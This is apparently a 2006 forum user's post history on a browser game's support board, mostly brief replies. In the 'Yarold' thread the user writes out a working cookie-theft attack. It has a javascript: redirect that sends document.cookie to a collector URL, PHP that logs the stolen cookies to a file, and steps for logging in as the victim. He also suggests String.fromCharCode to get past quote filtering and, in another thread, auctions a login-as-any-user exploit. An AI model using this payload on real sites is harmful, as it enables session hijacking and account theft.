Author |
Message |
Topic: changing username |
jeremy02
Replies: 7
Views: 5872
|
Forum: Support - Ask here Posted: Fri Dec 01, 2006 12:17 am Subject: changing username |
You can't. |
Topic: Some Link |
jeremy02
Replies: 11
Views: 6654
|
Forum: Support - Ask here Posted: Wed Jul 19, 2006 1:47 am Subject: Some Link |
I get the same thing as Immortal43. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Thu Jul 13, 2006 12:01 am Subject: Yarold |
Well I'd check for you to see if it's still exploitable, but of course Metalteo deleted my dynasty.
EDIT:
The only time cookie data isn't useful is when you validate the session somehow. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Wed Jul 12, 2006 11:21 pm Subject: Yarold |
Yarold, that is why I would make the code like this.
Code: |
javascript:window.location="http://www.site.com/cookie.php?c="+document.cookie
|
What that does is set the value "c" to the cookie from the site it's redirecting from.
Now, you make cookie.php look like this.
Code: |
$cookie = $_GET['c'];
$fp = fopen("log.htm", 'w');
fwrite($fp, $cookie . "<br>");
fclose($fp);
|
So now that you wrote the users cookie to log.htm, you can look at it and replace your own cookie data with theirs, meaning that you will then be logged in as that user. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Wed Jul 12, 2006 2:22 am Subject: Yarold |
Yarold wrote: |
As for problem. It doesn't look urgent |
Not true. This is the same problem that before allowed me to access 100s of accounts.
You think it's safe because you now filter ' and ", but you are forgetting about String.fromCharCode. |
Topic: Metalteo |
jeremy02
Replies: 1
Views: 1790
|
Forum: Support - Ask here Posted: Sat Jul 08, 2006 10:29 am Subject: Metalteo |
I'm trying to help the site out, and you get mad?
You tell me to steal your user's accounts?
Are you on your period?
I wasn't threatening to do anything, I was just alerting you to the problem. Don't be mad because you can't blame this on a certain site I am affiliated with, as you have tried to do in the past. It is because of scripting in SWLE its self, just as it his been every time before. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Sat Jul 08, 2006 12:19 am Subject: Yarold |
Yup, that's your cookie data. |
Topic: Yarold Credits |
jeremy02
Replies: 1
Views: 2016
|
Forum: Support - Ask here Posted: Fri Jul 07, 2006 10:15 pm Subject: Yarold Credits |
If it's a link with a click limit then that's why, they have to be worth more since you can click less. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Fri Jul 07, 2006 10:15 pm Subject: Yarold |
What does it say?
Basically, I could be stealing every user's account on this site who uses IE and views the dynasties page. |
Topic: Unban Me Pls |
jeremy02
Replies: 7
Views: 4856
|
Forum: Banned accounts Posted: Fri Jul 07, 2006 3:40 pm Subject: Unban Me Pls |
In that case, your account has probably been deleted due to inactivity. |
Topic: Yarold |
jeremy02
Replies: 14
Views: 8046
|
Forum: Support - Ask here Posted: Fri Jul 07, 2006 12:20 pm Subject: Yarold |
Anyone have any idea where Yarold is, or when he'll be online next?
Can someone view the dynasties page in IE and tell me if anything happens? |
Topic: buckhorn's account |
jeremy02
Replies: 1
Views: 2072
|
Forum: Support - Ask here Posted: Wed Jun 07, 2006 9:44 pm Subject: buckhorn's account |
Tell them to use a different browser. |
Topic: Administrators and Moderators |
jeremy02
Replies: 1
Views: 1912
|
Forum: Support - Ask here Posted: Mon Jun 05, 2006 6:09 am Subject: Administrators and Moderators |
I submitted a link that was denied. I only submitted the link to test for an exploit. If any administrator or moderator can remember denying this link, please post here or contact me in some way. |
Topic: Exploit For Sale |
jeremy02
Replies: 4
Views: 3633
|
Forum: Support - Ask here Posted: Tue May 30, 2006 4:39 am Subject: Exploit For Sale |
I'm not gunna use the exploit myself...but I mean I need some reward. :-p |
Topic: Exploit For Sale |
jeremy02
Replies: 4
Views: 3633
|
Forum: Support - Ask here Posted: Mon May 29, 2006 6:12 am Subject: Exploit For Sale |
Well, noone bidded, so that means I have to extend it, and make it a little more interesting by telling what the exploit does.
The exploit allows you to login to any users account that you target. Can't go into detail.
Since noone bidded, the starting bid now moves up to 450 credits. I can give Yarold a permanent fix for a link at the top of every page on the left of "Welcome user, from dynasty dynasty" that says "Play the coolest game on the internet!" and points to http://www.alex3oo2.com/sw/...for 24 hours only, then the link can be removed.
As I said, the fix is permanent, so even when you add new scripts to the site you don't have to worry about these types of exploits. |
Topic: Exploit For Sale |
jeremy02
Replies: 4
Views: 3633
|
Forum: Support - Ask here Posted: Sun May 28, 2006 8:42 pm Subject: Exploit For Sale |
I need some credits to let people know about Samurai War, so I'm selling an exploit to the highest bidder. Bids start at 300 credits.
Bidding ends 5/28/06 12:01 A.M. EST, start bidding!
(Since admins. have an unlimited supply of credits, I expect them to win, which is why I made this thread...so chill out. ) |
Topic: Support Me |
jeremy02
Replies: 9
Views: 4666
|
Forum: Support - Ask here Posted: Fri May 26, 2006 3:58 am Subject: Support Me |
This can still be exploited, Yarold. |
Topic: Support Me |
jeremy02
Replies: 9
Views: 4666
|
Forum: Support - Ask here Posted: Tue May 23, 2006 9:51 pm Subject: Support Me |
This is exactly why. Would you like to request a message to appear there? |
Topic: Support Me |
jeremy02
Replies: 9
Views: 4666
|
Forum: Support - Ask here Posted: Mon May 22, 2006 5:06 am Subject: Support Me |
Thanks, you just helped me find an exploit which I'm reporting to Yarold.
EDIT:
It also seems that it didn't take the credits when I made the dynasty, and there's nothing in my transfers history saying I even got them. |
Topic: Support Me |
jeremy02
Replies: 9
Views: 4666
|
Forum: Support - Ask here Posted: Mon May 22, 2006 5:02 am Subject: Support Me |
Thanks much. |
|